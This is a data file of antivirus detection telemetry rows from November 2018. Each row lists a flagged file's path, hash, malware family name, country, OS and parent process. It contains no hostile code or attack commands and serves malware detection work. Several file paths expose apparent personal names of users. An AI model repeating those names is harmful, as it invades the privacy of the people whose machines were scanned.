  Row(detection=Row(filename='assad_fabian.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Assad_Fabian.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='73ce43d2a0d2b5af4a0b19f6efb0a3a2022dee9922541ba0e7e7ca048e1023fd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0007ecd8', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp0007ecd8', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:44:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libwrapper30.exe', filepath='C:\\Program Files\\Common Files\\Autodesk Shared\\Revit Shared\\LibWrapper30.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='1e9ab73a0817339d886f176ba1a482acc85bc63d39b35010d1383a75a8f6f2a7', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:56:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='synctask.exe', filepath='C:\\Users\\X\\AppData\\Local\\29d4af865fc1c2f21c02365364e4bd9d\\synctask.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='e4b6c38e78ff4fc0d5fbe2998c3558522f1186a370f41cc0a1dd516bb4c88c0b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{8308B24D-24B1-4D07-868B-83DB87E48564}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='b0bc04b2ef41cf2611599cc94dbc02bb0ba52afe9e5418254d79ee5325a69976', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:00:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qbivnfuy.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\QBiVNfUy.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='docenze.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ebc3c31328d3e062a4cae121b7ff8441a9beefe61fefaddd01a462789bb5fcb4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:52:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='assistente familiare.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\SCHEDE CORSI SOCIOSANITARI\\ASSISTENTE FAMILIARE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:16:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qeyahdan.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\QeyAhDAN.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cytexpert.exe', filepath='C:\\Program Files\\CytExpert\\CytExpert.exe', filesize=67840000, name='HEUR/AGEN.1013859.#M1.#R1'), hash='df1d9515de837d35ea4344fb3b5bf25f667222764bc8a3df3250b962e2d27467', metadata=Row(cmdline='\\\\\\/V', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\msiexec.exe', parentsize=73216, timestamp='2018-11-01T01:19:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d35112f8c0292ce04ccea68a37747fd9270f5901c6d566c65fe7249499fdc72b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\D35112F8C0292CE04CCEA68A37747FD9270F5901C6D566C65FE7249499FDC72B', filesize=176000, name='W32/Neshta.A.#M1.#R1'), hash='d35112f8c0292ce04ccea68a37747fd9270f5901c6d566c65fe7249499fdc72b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:11:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151852-655c50cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151852-655C50CD', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:18:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='C:\\Users\\X\\Downloads\\Borland.Delphi.v7.Studio.Enterprise\\Borland.Delphi.v7.Studio.Enterprise\\autorun.exe', filesize=512000, name='BDS/Administratio.A.#M1.#R1'), hash='a64d982204d814633b22e33b5e4ff5221e09b74f81937e7cfa5a6954005f1747', metadata=Row(cmdline='x -iext -ow -ver -- \\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Borland.Delphi.v7.Studio.Enterprise\\\\\\\\Borland.Delphi.v7.Studio.Enterprise.iso\\\\\\" C:\\\\\\\\Users\\\\\\\\User\\\\\\\\Downloads\\\\\\\\Borland.Delphi.v7.Studio.Enterprise\\\\\\\\Borland.Delphi.v7.Studio.Enterprise\\\\\\\\', country='LV', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1551248, timestamp='2018-11-01T20:31:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unins000.exe', filepath='\\?\\J:\\العاب\\Bomberic 2\\unins000.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='de6c6888ce2be21a221e8d3b8cc9107a14a2caf112ca924f9f0e260b33b4cf2e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ecb2ff9ccfcb5b12794736ce29a327ec267608beb43fa7fe13780764a4ba3912', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\ECB2FF9CCFCB5B12794736CE29A327EC267608BEB43FA7FE13780764A4BA3912', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ecb2ff9ccfcb5b12794736ce29a327ec267608beb43fa7fe13780764a4ba3912', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:48:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='elettrico.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\ELETTRICO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9922e46dae1b6432d9a5474a0631efb2103e210e0d569796c00293a93328bfb0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\9922E46DAE1B6432D9A5474A0631EFB2103E210E0D569796C00293A93328BFB0', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9922e46dae1b6432d9a5474a0631efb2103e210e0d569796c00293a93328bfb0', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:54:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='roupzjdb.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\roUpZjDB.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='garlini paola.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\GARLINI PAOLA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150910-f5b8052c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150910-F5B8052C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='193df7a79e2a22984e7c48a5b9ecdcb71f9b3b6f', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\193df7a79e2a22984e7c48a5b9ecdcb71f9b3b6f', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='c92ef8c1f5cffa1ba39451667e8553086fc53a2c325c39adb7d18ccc2fc317b4', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:37:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150922-f8322a65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150922-F8322A65', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190257-dab9fd69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190257-DAB9FD69', filesize=64000, name='TR/Siggen.psvbr.#M1.#R1'), hash='bc0a114c0973d821f584a672f3d2c3b951288a0e721901ada7bd47acea4cdd2d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:02:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='samp-server.exe', filepath='C:\\Users\\X\\Desktop\\oLD sTREET\\samp-server.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='a2f3a38e346a138b082cab0efcf162ac24e47c14ac55c660a3f4fe4e9060af48', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611368, timestamp='2018-11-01T19:35:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0003442.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003442.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='3e57a70aec292df826b55843fea3cd60ed0fd93489f6e0093c993cf20f689064', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:29:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151248-95735a42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eba24208\\AVSCAN-20181104-141832-F573C2FF\\AVSCAN-20181104-151248-95735A42', filesize=556000, name='PUA/MPCCleaner.#M1.#R1'), hash='08cce85de6b7808af17666c9689a16e424590770839d9ee966d73b9580abc94f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T12:11:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-020951-b3c8a405', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eec69a79\\AVSCAN-20181105-015312-34104F76\\AVSCAN-20181105-020951-B3C8A405', filesize=4000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='1c4c82f51d22edcf97fd55cc3d2f064dc71d86376d0b8aa92088510cb8acbdda', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:09:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='topicadmin_modlayer.htm', filepath='d:\\baidunetdiskdownload\\精美十配色大型地方门户网站源码\\template\\default\\forum\\topicadmin_modlayer.htm', filesize=220000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='97d8cb1012ba7838e6804e54ae287fdd1b432579d1f25fab9e83e5f5c9f62dca', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:44:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='a96290b02ca8f9ec46bf2021980c1cdb156290d0d603123a65cf58b56323af56', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:52:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-121916-7f557941', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24c2bae8\\AVSCAN-20181104-121126-1AF5F320\\AVSCAN-20181104-121916-7F557941', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:01:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='F:\\bin_3rdparty_1_8_1_6\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T19:52:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151021-be665736', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-151021-BE665736', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:10:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T13:13:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-04T15:18:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T12:49:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215213-4799b76d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215213-4799B76D', filesize=64000, name='TR/Siggen.64000.2.#M1.#R1'), hash='33e25a0a50e61900ef969fe4a406e8d89dec25d5081b0403b61e97927c18403d', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:52:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4245072, timestamp='2018-11-04T01:39:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tobii_firmware_upgrade.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Tobii\\Service\\tobii_firmware_upgrade.dll', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='a1d6b8cd7cb92d828f99be298044c4d07386481636387045607f4c73a15ab4b8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:32:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151533-f4f7b382', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-151533-F4F7B382', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:15:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:31:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-170655-5a873b40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ec7aee53\\AVSCAN-20181104-170624-552EB310\\AVSCAN-20181104-170655-5A873B40', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:03:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:32:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-183347-7c776a11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d544b39\\AVSCAN-20181104-183252-7620449B\\AVSCAN-20181104-183347-7C776A11', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='84e43d14e7fb9b5cfa4592b352c3f419d28549bdfc51546aba18b12f2b5fab30', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:33:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\SoftwareUpdater\\AviraSoftwareUpdaterToastNotificationsBridge.exe', parentsize=103880, timestamp='2018-11-04T21:04:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132358-50e237be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132358-50E237BE', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:23:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:46:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3fafbd95a0d63ca588eb3a76deaa41c632bde63df9db5663a7f66b534e58c369', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:50:59Z'), dt=datetime.date(2018, 11, 4)),
